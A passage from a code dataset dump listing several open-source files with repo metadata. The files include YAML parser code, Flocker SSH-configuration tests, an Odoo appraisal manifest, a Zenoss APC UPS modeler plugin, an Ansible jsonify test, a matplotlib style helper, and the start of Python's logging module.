self.parse_flow_sequence_entry\n token = self.peek_token()\n return MappingEndEvent(token.start_mark, token.start_mark)\n\n # flow_mapping ::= FLOW-MAPPING-START\n # (flow_mapping_entry FLOW-ENTRY)*\n # flow_mapping_entry?\n # FLOW-MAPPING-END\n # flow_mapping_entry ::= flow_node | KEY flow_node? (VALUE flow_node?)?\n\n def parse_flow_mapping_first_key(self):\n token = self.get_token()\n self.marks.append(token.start_mark)\n return self.parse_flow_mapping_key(first=True)\n\n def parse_flow_mapping_key(self, first=False):\n if not self.check_token(FlowMappingEndToken):\n if not first:\n if self.check_token(FlowEntryToken):\n self.get_token()\n else:\n token = self.peek_token()\n raise ParserError(\"while parsing a flow mapping\", self.marks[-1],\n \"expected ',' or '}', but got %r\" % token.id, token.start_mark)\n if self.check_token(KeyToken):\n token = self.get_token()\n if not self.check_token(ValueToken,\n FlowEntryToken, FlowMappingEndToken):\n self.states.append(self.parse_flow_mapping_value)\n return self.parse_flow_node()\n else:\n self.state = self.parse_flow_mapping_value\n return self.process_empty_scalar(token.end_mark)\n elif not self.check_token(FlowMappingEndToken):\n self.states.append(self.parse_flow_mapping_empty_value)\n return self.parse_flow_node()\n token = self.get_token()\n event = MappingEndEvent(token.start_mark, token.end_mark)\n self.state = self.states.pop()\n self.marks.pop()\n return event\n\n def parse_flow_mapping_value(self):\n if self.check_token(ValueToken):\n token = self.get_token()\n if not self.check_token(FlowEntryToken, FlowMappingEndToken):\n self.states.append(self.parse_flow_mapping_key)\n return self.parse_flow_node()\n else:\n self.state = self.parse_flow_mapping_key\n return self.process_empty_scalar(token.end_mark)\n else:\n self.state = self.parse_flow_mapping_key\n token = self.peek_token()\n return self.process_empty_scalar(token.start_mark)\n\n def parse_flow_mapping_empty_value(self):\n self.state = self.parse_flow_mapping_key\n return self.process_empty_scalar(self.peek_token().start_mark)\n\n def process_empty_scalar(self, mark):\n return ScalarEvent(None, None, (True, False), u'', mark, mark)\n\n"},"license":{"kind":"string","value":"mit"}}},{"rowIdx":2421,"cells":{"repo_name":{"kind":"string","value":"Azulinho/flocker"},"path":{"kind":"string","value":"flocker/cli/functional/test_sshconfig.py"},"copies":{"kind":"string","value":"15"},"size":{"kind":"string","value":"9942"},"content":{"kind":"string","value":"# Copyright Hybrid Logic Ltd. See LICENSE file for details.\n\n\"\"\"\nTests for ``flocker.cli._sshconfig``.\n\"\"\"\n\nfrom os.path import expanduser\nfrom socket import socket\nfrom subprocess import CalledProcessError\n\nfrom twisted.trial.unittest import TestCase\nfrom twisted.python.filepath import FilePath, Permissions\nfrom twisted.internet.threads import deferToThread\n\nfrom .. import configure_ssh\nfrom .._sshconfig import OpenSSHConfiguration\nfrom ...testtools.ssh import create_ssh_server, create_ssh_agent, if_conch\n\ntry:\n from twisted.conch.ssh.keys import Key\nexcept ImportError:\n pass\n\n\ndef goodlines(path):\n \"\"\"\n Return a list of lines read from ``path`` excluding those that are blank\n or begin with ``#``.\n\n :param FilePath path: The path to the file to read.\n\n :return: A ``list`` of ``bytes`` giving good lines from the file.\n \"\"\"\n return list(line for line in path.getContent().splitlines()\n if line and not line.strip().startswith(b\"#\"))\n\n\nclass ConfigureSSHTests(TestCase):\n \"\"\"\n Tests for ``configure_ssh``.\n \"\"\"\n def setUp(self):\n self.ssh_config = FilePath(self.mktemp())\n self.server = create_ssh_server(self.ssh_config)\n # Create a fake local keypair\n self.addCleanup(self.server.restore)\n self.flocker_config = FilePath(self.mktemp())\n self.config = OpenSSHConfiguration(\n ssh_config_path=self.ssh_config,\n flocker_path=self.flocker_config)\n self.config.create_keypair()\n self.configure_ssh = self.config.configure_ssh\n self.agent = create_ssh_agent(self.server.key_path, testcase=self)\n\n def test_connection_failed(self):\n \"\"\"\n If an SSH connection cannot be established to the given address then an\n exception is raised explaining that this is so.\n \"\"\"\n # Bind a port and guarantee it is not accepting connections.\n blocker = socket()\n blocker.bind((b\"127.0.0.1\", 0))\n port = blocker.getsockname()[1]\n\n exc = self.assertRaises(CalledProcessError,\n self.configure_ssh, b\"127.0.0.1\", port)\n # There are different error messages on different platforms.\n # On Linux the error may be:\n # 'ssh: connect to host 127.0.0.1 port 34716: Connection refused\\r\\n'\n # On OS X the error may be:\n # 'ssh: connect to host 127.0.0.1 port 56711: Operation timed out\\r\\n'\n self.assertTrue(b\"refused\" in exc.output or \"Operation timed out\" in\n exc.output)\n\n def test_authorized_keys(self):\n \"\"\"\n When the SSH connection is established, the ``~/.ssh/authorized_keys``\n file has the public part of the generated key pair appended to it.\n \"\"\"\n configuring = deferToThread(\n self.configure_ssh, self.server.ip, self.server.port)\n\n def configured(ignored):\n id_rsa_pub = self.ssh_config.child(b\"id_rsa_flocker.pub\")\n keys = self.server.home.descendant([b\".ssh\", b\"authorized_keys\"])\n\n # Compare the contents ignoring comments for ease.\n self.assertEqual(goodlines(id_rsa_pub), goodlines(keys))\n\n configuring.addCallback(configured)\n return configuring\n\n def test_authorized_keys_already_in_place(self):\n \"\"\"\n When the SSH connection is established, if the\n ``~/.ssh/authorized_keys`` file already has the public part of the key\n pair then it is not appended again.\n \"\"\"\n configuring = deferToThread(\n self.configure_ssh, self.server.ip, self.server.port)\n configuring.addCallback(\n lambda ignored:\n deferToThread(\n self.configure_ssh, self.server.ip, self.server.port))\n\n def configured(ignored):\n id_rsa_pub = self.ssh_config.child(b\"id_rsa_flocker.pub\")\n keys = self.server.home.descendant([b\".ssh\", b\"authorized_keys\"])\n self.assertEqual(goodlines(id_rsa_pub), goodlines(keys))\n configuring.addCallback(configured)\n return configuring\n\n def test_existing_authorized_keys_preserved(self):\n \"\"\"\n Any unrelated content in the ``~/.ssh/authorized_keys`` file is left in\n place by ``configure_ssh``.\n \"\"\"\n existing_keys = (\n b\"ssh-dss AAAAB3Nz1234567890 comment\\n\"\n b\"ssh-dss AAAAB3Nz0987654321 comment\\n\"\n )\n ssh_path = self.server.home.child(b\".ssh\")\n ssh_path.makedirs()\n\n authorized_keys = ssh_path.child(b\"authorized_keys\")\n authorized_keys.setContent(existing_keys)\n configuring = deferToThread(\n self.configure_ssh, self.server.ip, self.server.port)\n\n def configured(ignored):\n self.assertIn(existing_keys, authorized_keys.getContent())\n configuring.addCallback(configured)\n return configuring\n\n def test_flocker_keypair_written(self):\n \"\"\"\n ``configure_ssh`` writes the keypair to ``id_rsa_flocker`` and\n ``id_rsa_flocker.pub`` remotely.\n \"\"\"\n configuring = deferToThread(\n self.configure_ssh, self.server.ip, self.server.port)\n\n def configured(ignored):\n expected = (\n self.ssh_config.child(b\"id_rsa_flocker\").getContent(),\n self.ssh_config.child(b\"id_rsa_flocker.pub\").getContent()\n )\n actual = (\n self.flocker_config.child(b\"id_rsa_flocker\").getContent(),\n self.flocker_config.child(b\"id_rsa_flocker.pub\").getContent()\n )\n self.assertEqual(expected, actual)\n configuring.addCallback(configured)\n return configuring\n\n def test_flocker_keypair_permissions(self):\n \"\"\"\n ``configure_ssh`` writes the remote keypair with secure permissions.\n \"\"\"\n configuring = deferToThread(\n self.configure_ssh, self.server.ip, self.server.port)\n\n expected_private_key_permissions = Permissions(0600)\n expected_public_key_permissions = Permissions(0644)\n\n def configured(ignored):\n expected = (\n expected_private_key_permissions,\n expected_public_key_permissions\n )\n actual = (\n self.flocker_config.child(b\"id_rsa_flocker\").getPermissions(),\n self.flocker_config.child(\n b\"id_rsa_flocker.pub\").getPermissions()\n )\n self.assertEqual(expected, actual)\n configuring.addCallback(configured)\n return configuring\n\n\nclass CreateKeyPairTests(TestCase):\n \"\"\"\n Tests for ``create_keypair``.\n \"\"\"\n\n @if_conch\n def test_key_generated(self):\n \"\"\"\n ``create_keypair`` generates a new key pair and writes it locally to\n ``id_rsa_flocker`` and ``id_rsa_flocker.pub``.\n \"\"\"\n ssh_config = FilePath(self.mktemp())\n configurator = OpenSSHConfiguration(\n ssh_config_path=ssh_config, flocker_path=None)\n\n configurator.create_keypair()\n\n id_rsa = ssh_config.child(b\"id_rsa_flocker\")\n id_rsa_pub = ssh_config.child(b\"id_rsa_flocker.pub\")\n key = Key.fromFile(id_rsa.path)\n\n self.assertEqual(\n # Avoid comparing the comment\n key.public().toString(\n type=\"OPENSSH\", extra='test comment').split(None, 2)[:2],\n id_rsa_pub.getContent().split(None, 2)[:2])\n\n @if_conch\n def test_key_not_regenerated(self):\n \"\"\"\n ``create_keypair`` does not generate a new key pair if one can\n already be found in ``id_rsa_flocker`` and ``id_rsa_flocker.pub``.\n \"\"\"\n ssh_config = FilePath(self.mktemp())\n configurator = OpenSSHConfiguration(\n ssh_config_path=ssh_config, flocker_path=None)\n\n id_rsa = ssh_config.child(b\"id_rsa_flocker\")\n\n configurator.create_keypair()\n\n expected_key = Key.fromFile(id_rsa.path)\n\n configurator.create_keypair()\n\n self.assertEqual(expected_key, Key.fromFile(id_rsa.path))\n\n def test_key_permissions(self):\n \"\"\"\n ``create_keypair`` sets secure permissions on\n ``id_rsa_flocker`` and ``id_rsa_flocker.pub``.\n \"\"\"\n ssh_config = FilePath(self.mktemp())\n configurator = OpenSSHConfiguration(\n ssh_config_path=ssh_config, flocker_path=None)\n\n configurator.create_keypair()\n\n expected_private_key_permissions = Permissions(0600)\n expected_public_key_permissions = Permissions(0644)\n\n id_rsa = ssh_config.child(b\"id_rsa_flocker\")\n id_rsa_pub = ssh_config.child(b\"id_rsa_flocker.pub\")\n\n self.assertEqual(\n (expected_private_key_permissions,\n expected_public_key_permissions),\n (id_rsa.getPermissions(), id_rsa_pub.getPermissions()))\n\n\nclass OpenSSHDefaultsTests(TestCase):\n \"\"\"\n Tests for `OpenSSHConfiguration.defaults``.\n \"\"\"\n def test_flocker_path(self):\n \"\"\"\n ``OpenSSHConfiguration.defaults`` creates an instance with\n ``/etc/flocker`` as the Flocker configuration path.\n \"\"\"\n self.assertEqual(\n FilePath(b\"/etc/flocker\"),\n OpenSSHConfiguration.defaults().flocker_path)\n\n def test_ssh_config_path(self):\n \"\"\"\n ``OpenSSHConfiguration.defaults`` creates an instance with the current\n user's SSH configuration path as the SSH configuration path.\n \"\"\"\n expected = FilePath(expanduser(b\"~\")).child(b\".ssh\")\n self.assertEqual(\n expected, OpenSSHConfiguration.defaults().ssh_config_path)\n\n def test_configure_ssh(self):\n \"\"\"\n ``configure_ssh`` is taken from an ``OpenSSHConfiguration`` instance\n created using the ``defaults`` method.\n \"\"\"\n self.assertEqual(\n OpenSSHConfiguration.defaults().configure_ssh, configure_ssh)\n"},"license":{"kind":"string","value":"apache-2.0"}}},{"rowIdx":2422,"cells":{"repo_name":{"kind":"string","value":"vrenaville/OCB"},"path":{"kind":"string","value":"addons/hr_evaluation/__openerp__.py"},"copies":{"kind":"string","value":"53"},"size":{"kind":"string","value":"3305"},"content":{"kind":"string","value":"# -*- encoding: utf-8 -*-\n##############################################################################\n#\n# OpenERP, Open Source Management Solution\n# Copyright (C) 2004-2009 Tiny SPRL ().\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n##############################################################################\n\n{\n 'name': 'Employee Appraisals',\n 'version': '0.1',\n 'author': 'OpenERP SA',\n 'category': 'Human Resources',\n 'sequence': 31,\n 'website': 'https://www.odoo.com/page/appraisal',\n 'summary': 'Periodical Evaluations, Appraisals, Surveys',\n 'images': ['images/hr_evaluation_analysis.jpeg',\n 'images/hr_evaluation.jpeg',\n 'images/hr_interview_requests.jpeg'],\n 'depends': ['hr', 'calendar', 'survey'],\n 'description': \"\"\"\nPeriodical Employees evaluation and appraisals\n==============================================\n\nBy using this application you can maintain the motivational process by doing periodical evaluations of your employees' performance. The regular assessment of human resources can benefit your people as well your organization.\n\nAn evaluation plan can be assigned to each employee. These plans define the frequency and the way you manage your periodic personal evaluations. You will be able to define steps and attach interview forms to each step.\n\nManages several types of evaluations: bottom-up, top-down, self-evaluations and the final evaluation by the manager.\n\nKey Features\n------------\n* Ability to create employees evaluations.\n* An evaluation can be created by an employee for subordinates, juniors as well as his manager.\n* The evaluation is done according to a plan in which various surveys can be created. Each survey can be answered by a particular level in the employees hierarchy. The final review and evaluation is done by the manager.\n* Every evaluation filled by employees can be viewed in a PDF form.\n* Interview Requests are generated automatically by OpenERP according to employees evaluation plans. Each user receives automatic emails and requests to perform a periodical evaluation of their colleagues.\n\"\"\",\n \"data\": [\n 'security/ir.model.access.csv',\n 'security/hr_evaluation_security.xml',\n 'hr_evaluation_view.xml',\n 'report/hr_evaluation_report_view.xml',\n 'survey_data_appraisal.xml',\n 'hr_evaluation_data.xml',\n 'hr_evaluation_installer.xml',\n ],\n \"demo\": [\"hr_evaluation_demo.xml\"],\n # 'test': [\n # 'test/test_hr_evaluation.yml',\n # 'test/hr_evalution_demo.yml',\n # ],\n 'auto_install': False,\n 'installable': True,\n 'application': True,\n}\n"},"license":{"kind":"string","value":"agpl-3.0"}}},{"rowIdx":2423,"cells":{"repo_name":{"kind":"string","value":"anksp21/Community-Zenpacks"},"path":{"kind":"string","value":"ZenPacks.ZenSystems.ApcUps/ZenPacks/ZenSystems/ApcUps/modeler/plugins/ApcUpsDeviceMap.py"},"copies":{"kind":"string","value":"2"},"size":{"kind":"string","value":"2850"},"content":{"kind":"string","value":"##########################################################################\n# Author: Jane Curry, jane.curry@skills-1st.co.uk\n# Date: March 28th, 2011\n# Revised:\n#\n# ApcUpsDevice modler plugin\n#\n# This program can be used under the GNU General Public License version 2\n# You can find full information here: http://www.zenoss.com/oss\n#\n##########################################################################\n\n__doc__ = \"\"\"ApcUpsDeviceMap\n\nGather information from APC UPS devices.\n\"\"\"\n\nfrom Products.DataCollector.plugins.CollectorPlugin import SnmpPlugin, GetMap\nfrom Products.DataCollector.plugins.DataMaps import MultiArgs\nimport re\n\nclass ApcUpsDeviceMap(SnmpPlugin):\n maptype = \"ApcUpsDeviceMap\"\n\n snmpGetMap = GetMap({\n '.1.3.6.1.4.1.318.1.1.1.1.1.1.0': 'setHWProductKey',\n '.1.3.6.1.4.1.318.1.1.1.1.2.1.0': 'setOSProductKey',\n '.1.3.6.1.4.1.318.1.1.1.1.2.3.0': 'setHWSerialNumber',\n '.1.3.6.1.4.1.318.1.1.1.2.2.5.0': 'numBatteryPacks',\n '.1.3.6.1.4.1.318.1.1.1.2.2.6.0': 'numBadBatteryPacks',\n '.1.3.6.1.4.1.318.1.1.1.4.1.1.0': 'basicOutputStatus',\n })\n\n def condition(self, device, log):\n \"\"\"only for boxes with proper object id\n \"\"\"\n return device.snmpOid.startswith(\".1.3.6.1.4.1.318.1.3.2\")\n\n\n def process(self, device, results, log):\n \"\"\"collect snmp information from this device\"\"\"\n log.info('processing %s for device %s', self.name(), device.id)\n getdata, tabledata = results\n om = self.objectMap(getdata)\n manufacturer = \"American Power Conversion Corp.\"\n om.setHWProductKey = MultiArgs(om.setHWProductKey, manufacturer)\n# log.debug(\"HWProductKey=%s Manufacturer = %s\" % (om.setHWProductKey, manufacturer))\n om.setOSProductKey = MultiArgs(om.setOSProductKey, manufacturer)\n# log.debug(\"OSProductKey=%s Manufacturer = %s\" % (om.setOSProductKey, manufacturer))\n if (om.basicOutputStatus < 1 or om.basicOutputStatus > 12):\n om.basicOutputStatus = 1\n index = om.basicOutputStatus\n om.basicOutputStatusText = self.basicOutputStatusMap[index]\n\n\n return om\n\n basicOutputStatusMap = { 1: 'Unknown',\n 2: 'onLine',\n 3: 'onBattery',\n 4: 'onSmartBoost',\n 5: 'timedSleeping',\n 6: 'softwareBypass',\n 7: 'off',\n 8: 'rebooting',\n 9: 'switchedBypass',\n 10: 'hardwareFailureBypass',\n 11: 'sleepingUntilPowerReturn',\n 12: 'onSmartTrim',\n }\n\n"},"license":{"kind":"string","value":"gpl-2.0"}}},{"rowIdx":2424,"cells":{"repo_name":{"kind":"string","value":"shepdelacreme/ansible"},"path":{"kind":"string","value":"test/units/parsing/utils/test_jsonify.py"},"copies":{"kind":"string","value":"113"},"size":{"kind":"string","value":"1491"},"content":{"kind":"string","value":"# -*- coding: utf-8 -*-\n# (c) 2016, James Cammarata \n#\n# This file is part of Ansible\n#\n# Ansible is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# Ansible is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with Ansible. If not, see .\n\nfrom __future__ import (absolute_import, division, print_function)\n__metaclass__ = type\n\nfrom units.compat import unittest\nfrom ansible.parsing.utils.jsonify import jsonify\n\n\nclass TestJsonify(unittest.TestCase):\n def test_jsonify_simple(self):\n self.assertEqual(jsonify(dict(a=1, b=2, c=3)), '{\"a\": 1, \"b\": 2, \"c\": 3}')\n\n def test_jsonify_simple_format(self):\n res = jsonify(dict(a=1, b=2, c=3), format=True)\n cleaned = \"\".join([x.strip() for x in res.splitlines()])\n self.assertEqual(cleaned, '{\"a\": 1,\"b\": 2,\"c\": 3}')\n\n def test_jsonify_unicode(self):\n self.assertEqual(jsonify(dict(toshio=u'くらとみ')), u'{\"toshio\": \"くらとみ\"}')\n\n def test_jsonify_empty(self):\n self.assertEqual(jsonify(None), '{}')\n"},"license":{"kind":"string","value":"gpl-3.0"}}},{"rowIdx":2425,"cells":{"repo_name":{"kind":"string","value":"sharthee/ProgrammingAssignment2"},"path":{"kind":"string","value":"labs/lab2/cs109style.py"},"copies":{"kind":"string","value":"38"},"size":{"kind":"string","value":"1293"},"content":{"kind":"string","value":"from __future__ import print_function\n\nfrom IPython.core.display import HTML\nfrom matplotlib import rcParams\n\n#colorbrewer2 Dark2 qualitative color table\ndark2_colors = [(0.10588235294117647, 0.6196078431372549, 0.4666666666666667),\n (0.8509803921568627, 0.37254901960784315, 0.00784313725490196),\n (0.4588235294117647, 0.4392156862745098, 0.7019607843137254),\n (0.9058823529411765, 0.1607843137254902, 0.5411764705882353),\n (0.4, 0.6509803921568628, 0.11764705882352941),\n (0.9019607843137255, 0.6705882352941176, 0.00784313725490196),\n (0.6509803921568628, 0.4627450980392157, 0.11372549019607843),\n (0.4, 0.4, 0.4)]\n\ndef customize_mpl():\n \"\"\"Tweak matplotlib visual style\"\"\"\n print(\"Setting custom matplotlib visual style\")\n\n rcParams['figure.figsize'] = (10, 6)\n rcParams['figure.dpi'] = 150\n rcParams['axes.color_cycle'] = dark2_colors\n rcParams['lines.linewidth'] = 2\n rcParams['axes.grid'] = True\n rcParams['axes.facecolor'] = '#eeeeee'\n rcParams['font.size'] = 14\n rcParams['patch.edgecolor'] = 'none'\n\n\ndef customize_css():\n print(\"Setting custom CSS for the IPython Notebook\")\n styles = open('custom.css', 'r').read()\n return HTML(styles)\n"},"license":{"kind":"string","value":"mit"}}},{"rowIdx":2426,"cells":{"repo_name":{"kind":"string","value":"40223240/cadb_g3_0420"},"path":{"kind":"string","value":"static/Brython3.1.1-20150328-091302/Lib/logging/__init__.py"},"copies":{"kind":"string","value":"733"},"size":{"kind":"string","value":"66279"},"content":{"kind":"string","value":"# Copyright 2001-2013 by Vinay Sajip. All Rights Reserved.\n#\n# Permission to use, copy, modify, and distribute this software and its\n# documentation for any purpose and without fee is hereby granted,\n# provided that the above copyright notice appear in all copies and that\n# both that copyright notice and this permission notice appear in\n# supporting documentation, and that the name of Vinay Sajip\n# not be used in advertising or publicity pertaining to distribution\n# of the software without specific, written prior permission.\n# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING\n# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL\n# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR\n# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER\n# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT\n# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.\n\n\"\"\"\nLogging package for Python. Based on PEP 282 and comments thereto in\ncomp.lang.python.\n\nCopyright (C) 2001-2013 Vinay Sajip. All Rights Reserved.\n\nTo use, simply 'import logging' and log away!\n\"\"\"\n\nimport sys, os, time, io, traceback, warnings, weakref\nfrom string import Template\n\n__all__ = ['BASIC_FORMAT', 'BufferingFormatter', 'CRITICAL', 'DEBUG', 'ERROR',\n 'FATAL', 'FileHandler', 'Filter', 'Formatter', 'Handler', 'INFO',\n 'LogRecord', 'Logger', 'LoggerAdapter', 'NOTSET', 'NullHandler',\n 'StreamHandler', 'WARN', 'WARNING', 'addLevelName', 'basicConfig',\n 'captureWarnings', 'critical', 'debug', 'disable', 'error',\n 'exception', 'fatal', 'getLevelName', 'getLogger', 'getLoggerClass',\n 'info', 'log', 'makeLogRecord', 'setLoggerClass', 'warn', 'warning',\n 'getLogRecordFactory', 'setLogRecordFactory', 'lastResort']\n\ntry:\n import threading\nexcept ImportError: #pragma: no cover\n threading = None\n\n__author__ = \"Vinay Sajip \"\n__status__ = \"production\"\n__version__ = \"0.5.1.2\"\n__date__ = \"07 February 2010\"\n\n#---------------------------------------------------------------------------\n# Miscellaneous module data\n#---------------------------------------------------------------------------\n\n#\n# _srcfile is used when walking the stack to check when we've got the first\n# caller stack frame.\n#\nif hasattr(sys, 'frozen'): #support for py2exe\n _srcfile = \"logging%s__init__%s\" % (os.sep, __file__[-4:])\nelse:\n _srcfile = __file__\n_srcfile = os.path.normcase(_srcfile)\n\n\nif hasattr(sys, '_getframe'):\n currentframe = lambda: sys._getframe(3)\nelse: #pragma: no cover\n def currentframe():\n \"\"\"Return the frame object for the caller's stack frame.\"\"\"\n try:\n raise Exception\n except:\n return sys.exc_info()[2].tb_frame.f_back\n\n# _srcfile is only used in conjunction with sys._getframe().\n# To provide compatibility with older versions of Python, set _srcfile\n# to None if _getframe() is not available; this value will prevent\n# findCaller() from being called.\n#if not hasattr(sys, \"_getframe\"):\n# _srcfile = None\n\n#\n#_startTime is used as the base when calculating the relative time of events\n#\n_startTime = time.time()\n\n#\n#raiseExceptions is used to see if exceptions during handling should be\n#propagated\n#\nraiseExceptions = True\n\n#\n# If you don't want threading information in the log, set this to zero\n#\nlogThreads = True\n\n#\n# If you don't want multiprocessing information in the log, set this to zero\n#\nlogMultiprocessing = True\n\n#\n# If you don't want process information in the log, set this to zero\n#\nlogProcesses = True\n\n#---------------------------------------------------------------------------\n# Level related stuff\n#---------------------------------------------------------------------------\n#\n# Default levels and level names, these can be replaced with any positive set\n# of values having corresponding names. There is a pseudo-level, NOTSET, which\n# is only really there as a lower limit for user-defined levels. Handlers and\n# loggers are initialized with NOTSET so that they will log all messages, even\n# at user-defined levels.\n#\n\nCRITICAL = 50\nFATAL = CRITICAL\nERROR = 40\nWARNING = 30\nWARN = WARNING\nINFO = 20\nDEBUG = 10\nNOTSET = 0\n\n_levelNames = {\n CRITICAL : 'CRITICAL',\n ERROR : 'ERROR',\n WARNING : 'WARNING',\n INFO : 'INFO',\n DEBUG : 'DEBUG',\n NOTSET : 'NOTSET',\n 'CRITICAL' : CRITICAL,\n 'ERROR' : ERROR,\n 'WARN' : WARNING,\n 'WARNING' : WARNING,\n 'INFO' : INFO,\n 'DEBUG' : DEBUG,\n 'NOTSET' : NOTSET,\n}\n\ndef getLevelName(level):\n \"\"\"\n Return the textual representation of logging level 'level'.\n\n If the level is one of the predefined levels (CRITICAL, ERROR, WARNING,\n INFO, DEBUG) then you get the corresponding string. If you have\n associated levels with names using addLevelName then the name you have\n associated with 'level' is returned.\n\n If a numeric value corresponding to one of the defined levels is passed\n in, the corresponding string representation is returned.\n\n Otherwise, the string \"Level %s\" % level is returned.\n \"\"\"\n return _levelNames.get(level, (\"Level %s\" % level))\n\ndef addLevelName(level, levelName):\n \"\"\"\n Associate 'levelName' with 'level'.\n\n This is used when converting levels to text during message formatting.\n \"\"\"\n _acquireLock()\n try: #unlikely to cause an exception, but you never know...\n _levelNames[level] = levelName\n _levelNames[levelName] = level\n finally:\n _releaseLock()\n\ndef _checkLevel(level):\n if isinstance(level, int):\n rv = level\n elif str(level) == level:\n if level not in _levelNames:\n raise ValueError(\"Unknown level: %r\" % level)\n rv = _levelNames[level]\n else:\n raise TypeError(\"Level not an integer or a valid string: %r\" % level)\n return rv\n\n#---------------------------------------------------------------------------\n# Thread-related stuff\n#---------------------------------------------------------------------------\n\n#\n#_lock is used to serialize access to shared data structures in this module.\n#This needs to be an RLock because fileConfig() creates and configures\n#Handlers, and so might arbitrary user threads. Since Handler code updates the\n#shared dictionary _handlers, it needs to acquire the lock. But if configuring,\n#the lock would already have been acquired - so we need an RLock.\n#The same argument applies to Loggers and Manager.loggerDict.\n#\nif threading:\n _lock = threading.RLock()\nelse: #pragma: no cover\n _lock = None\n\n\ndef _acquireLock():\n \"\"\"\n Acquire the module-level lock for serializing access to shared data.\n\n This should be released with _releaseLock().\n \"\"\"\n if _lock:\n _lock.acquire()\n\ndef _releaseLock():\n \"\"\"\n Release the module-level lock acquired by calling _acquireLock().\n \"\"\"\n if _lock:\n _lock.release()\n\n#---------------------------------------------------------------------------\n# The logging record\n#---------------------------------------------------------------------------\n\nclass LogRecord(object):\n \"\"\"\n A LogRecord instance represents an event being logged.\n\n LogRecord instances are created every time something is logged. They\n contain all the information pertinent to the event being logged. The\n main information passed in is in msg and args, which are combined\n using str(msg) % args to create the message field of the record. The\n record also includes information such as when the record was created,\n the source line where the logging call was made, and any exception\n information to be logged.\n \"\"\"\n def __init__(self, name, level, pathname, lineno,\n msg, args, exc_info, func=None, sinfo=None, **kwargs):\n \"\"\"\n Initialize a logging record with interesting information.\n \"\"\"\n ct = time.time()\n self.name = name\n self.msg = msg\n #\n # The following statement allows passing of a dictionary as a sole\n # argument, so that you can do something like\n # logging.debug(\"a %(a)d b %(b)s\", {'a':1, 'b':2})\n # Suggested by Stefan Behnel.\n # Note that without the test for args[0], we get a problem because\n # during formatting, we test to see if the arg is present using\n # 'if self.args:'. If the event being logged is e.g. 'Value is %d'\n # and if the passed arg fails 'if self.args:' then no formatting\n # is done. For example, logger.warning('Value is %d', 0) would log\n # 'Value is %d' instead of 'Value is 0'.\n # For the use case of passing a dictionary, this should not be a\n # problem.\n if args and len(args) == 1 and isinstance(args[0], dict) and args[0]:\n args = args[0]\n self.args = args\n self.levelname = getLevelName(level)\n self.levelno = level\n self.pathname = pathname\n try:\n self.filename = os.path.basename(pathname)\n self.module = os.path.splitext(self.filename)[0]\n except (TypeError, ValueError, AttributeError):\n self.filename = pathname\n self.module = \"Unknown module\"\n self.exc_info = exc_info\n self.exc_text = None # used to cache the traceback text\n self.stack_info = sinfo\n self.lineno = lineno\n self.funcName = func\n self.created = ct\n self.msecs = (ct - int(ct)) * 1000\n self.relativeCreated = (self.created - _startTime) * 1000\n if logThreads and threading:\n self.thread = threading.get_ident()\n self.threadName = threading.current_thread().name\n else: # pragma: no cover\n self.thread = None\n self.threadName = None\n if not logMultiprocessing: # pragma: no cover\n self.processName = None\n else:\n self.processName = 'MainProcess'\n mp = sys.modules.get('multiprocessing')\n if mp is not None:\n # Errors may occur if multiprocessing has not finished loading\n # yet - e.g. if a custom import hook causes third-party code\n # to run when multiprocessing calls import. See issue 8200\n # for an example\n try:\n self.processName = mp.current_process().name\n except Exception: #pragma: no cover\n pass\n if logProcesses and hasattr(os, 'getpid'):\n self.process = os.getpid()\n else:\n self.process = None\n\n def __str__(self):\n return ''%(self.name, self.levelno,\n self.pathname, self.lineno, self.msg)\n\n def getMessage(self):\n \"\"\"\n Return the message for this LogRecord.\n\n Return the message for this LogRecord after merging any user-supplied\n arguments with the message.\n \"\"\"\n msg = str(self.msg)\n if self.args:\n msg = msg % self.args\n return msg\n\n#\n# Determine which class to use when instantiating log records.\n#\n_logRecordFactory = LogRecord\n\ndef setLogRecordFactory(factory):\n \"\"\"\n Set the factory to be used when instantiating a log record.\n\n :param factory: A callable which will be called to instantiate\n a log record.\n \"\"\"\n global _logRecordFactory\n _logRecordFactory = factory\n\ndef getLogRecordFactory():\n \"\"\"\n Return the factory to be used when instantiating a log record.\n \"\"\"\n\n return _logRecordFactory\n\ndef makeLogRecord(dict):\n \"\"\"\n Make a LogRecord whose attributes are defined by the specified dictionary,\n This function is useful for converting a logging event received over\n a socket connection (which is sent as a dictionary) into a LogRecord\n instance.\n \"\"\"\n rv = _logRecordFactory(None, None, \"\", 0, \"\", (), None, None)\n rv.__dict__.update(dict)\n return rv\n\n#---------------------------------------------------------------------------\n# Formatter classes and functions\n#---------------------------------------------------------------------------\n\nclass PercentStyle(object):\n\n default_format = '%(message)s'\n asctime_format = '%(asctime)s'\n asctime_search = '%(asctime)'\n\n def __init__(self, fmt):\n self._fmt = fmt or self.default_format\n\n def usesTime(self):\n return self._fmt.find(self.asctime_search) >= 0\n\n def format(self, record):\n return self._fmt % record.__dict__\n\nclass StrFormatStyle(PercentStyle):\n default_format = '{message}'\n asctime_format = '{asctime}'\n asctime_search = '{asctime'\n\n def format(self, record):\n return self._fmt.format(**record.__dict__)\n\n\nclass StringTemplateStyle(PercentStyle):\n default_format = '${message}'\n asctime_format = '${asctime}'\n asctime_search = '${asctime}'\n\n def __init__(self, fmt):\n self._fmt = fmt or self.default_format\n self._tpl 